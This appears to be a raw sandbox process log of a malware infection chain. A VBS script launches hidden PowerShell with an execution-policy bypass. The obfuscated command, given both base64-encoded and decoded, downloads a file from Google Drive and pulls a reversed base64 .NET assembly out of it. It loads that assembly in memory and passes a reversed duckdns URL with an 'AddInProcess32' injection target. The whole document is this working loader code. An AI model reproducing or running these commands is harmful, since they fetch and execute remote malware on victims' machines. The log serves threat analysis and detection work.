wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\fridayfiledatingmanagerfMPDW-constraints.vbs
1720powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWVYICgoJ21CUScrJ2ltYWdlVXJsID0gQnJ0aHR0cHM6JysnLy9kcml2ZS5nb29nbGUuY28nKydtL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xN2tRSVRGSloxdHFkcVRWeWM4SnlLQ1JzQWIwODNGNEcgQnJ0O21CUXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzJysndGVtLk5ldC5XZScrJ2JDbGllbnQ7bUJRaW1hZ2VCeXRlcyA9IG1CUXdlYkNsaWVudC5Eb3dubG9hZERhdGEobUJRaW1hZ2UnKydVcmwpO21CUWltYWdlVGV4dCA9IFtTeXN0ZScrJ20uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKG1CUWltYWdlQnl0ZXMpO21CUXN0YXJ0RmxhZyA9IEJydDw8QkFTRTY0X1NUQVJUPj5CcnQ7bUJRZW5kRmxhZyA9IEJydDw8QkFTRTY0X0VORD4+QnJ0O21CUXN0YXJ0SW5kZXggPSBtQlFpbWFnZVRleHQuSW5kZXhPZihtQlFzdGFydEZsYWcpO21CUWVuZEluZGV4ID0gbUJRaW1hZ2VUZXh0LkluZGV4T2YobUJRZW5kRmxhZyk7bUJRc3RhJysncnRJbmRleCAtZ2UgMCAtYW5kIG1CUWVuZEluZGV4JysnIC1ndCBtQlFzdGFydEluZGV4O21CUXN0YXJ0SW5kZXgnKycgKz0gbUJRc3RhcnRGbGFnLkxlbmd0aDttQlFiYXNlNjRMZW5ndGggPSBtQlFlbmRJbmRleCAtIG1CUXN0YXJ0SW5kZXg7bUJRYmFzZScrJzY0Q29tbWFuZCA9IG1CUWltYWdlVGV4dC5TdWJzdHJpbmcobUJRc3RhcnRJbmRleCwgbUJRYmFzZTY0TGVuZ3RoKTttQlFiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChtQlFiJysnYXNlNjRDb21tYW5kLlRvQ2hhckFyJysncmF5KCkgc0l6IEZvckVhJysnY2gtT2JqJysnZWN0IHsgbUJRXyB9KVstMS4uLShtQicrJ1FiYXNlNicrJzRDJysnb21tYW5kLkxlbmd0aCldO21CUWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcobUJRYmFzZTY0UmUnKyd2ZXJzZWQpO21CUWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzJysnc2VtYmx5XTo6TG9hZChtQlFjb21tYW5kQnl0ZXMpO21CUXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoQnJ0VkFJQnJ0KTttQlF2YWlNZXRob2QuSW52b2tlKG1CUW51bGwsIEAoQnJ0dHh0LmJiYmJiYmJiYmJiZXdtYWRhbS9ncm8uc25ka2N1ZC5yZWdhbmFtbGEnKydjb2x5YWRpcmYvLycrJzpwdHRoQnJ0LCBCcnRkZXNhdGl2YWRvQnJ0LCBCcnRkZXNhdGl2YWRvQnJ0LCBCcnRkZXNhdGl2YWRvQnJ0LCBCcnRBZGRJJysnblByb2Nlc3MzMkJydCwgQnJ0ZGVzYXRpdmFkb0JydCwgQnJ0ZGVzYXRpdmFkb0JydCknKycpOycpLlJFUExhY2UoJ21CUScsW1NUUmluR11bY0hBcl0zNikuUkVQTGFjZSgoW2NIQXJdNjYrW2NIQXJdMTE0K1tjSEFyXTExNiksW1NUUmluR11bY0hBcl0zOSkuUkVQTGFjZSgoW2NIQXJdMTE1K1tjSEFyXTczK1tjSEFyXTEyMiksJ3wnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
2088powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "IeX (('mBQ'+'imageUrl = Brthttps:'+'//drive.google.co'+'m/uc?export=download&id=17kQITFJZ1tqdqTVyc8JyKCRsAb083F4G Brt;mBQwebClient = New-Object Sys'+'tem.Net.We'+'bClient;mBQimageBytes = mBQwebClient.DownloadData(mBQimage'+'Url);mBQimageText = [Syste'+'m.Text.Encoding]::UTF8.GetString(mBQimageBytes);mBQstartFlag = Brt<<BASE64_START>>Brt;mBQendFlag = Brt<<BASE64_END>>Brt;mBQstartIndex = mBQimageText.IndexOf(mBQstartFlag);mBQendIndex = mBQimageText.IndexOf(mBQendFlag);mBQsta'+'rtIndex -ge 0 -and mBQendIndex'+' -gt mBQstartIndex;mBQstartIndex'+' += mBQstartFlag.Length;mBQbase64Length = mBQendIndex - mBQstartIndex;mBQbase'+'64Command = mBQimageText.Substring(mBQstartIndex, mBQbase64Length);mBQbase64Reversed = -join (mBQb'+'ase64Command.ToCharAr'+'ray() sIz ForEa'+'ch-Obj'+'ect { mBQ_ })[-1..-(mB'+'Qbase6'+'4C'+'ommand.Length)];mBQcommandBytes = [System.Convert]::FromBase64String(mBQbase64Re'+'versed);mBQloadedAssembly = [System.Reflection.As'+'sembly]::Load(mBQcommandBytes);mBQvaiMethod = [dnlib.IO.Home].GetMethod(BrtVAIBrt);mBQvaiMethod.Invoke(mBQnull, @(Brttxt.bbbbbbbbbbbewmadam/gro.sndkcud.reganamla'+'colyadirf//'+':ptthBrt, BrtdesativadoBrt, BrtdesativadoBrt, BrtdesativadoBrt, BrtAddI'+'nProcess32Brt, BrtdesativadoBrt, BrtdesativadoBrt)'+');').REPLace('mBQ',[STRinG][cHAr]36).REPLace(([cHAr]66+[cHAr]114+[cHAr]116),[STRinG][cHAr]39).REPLace(([cHAr]115+[cHAr]73+[cHAr]122),'|'))"
2200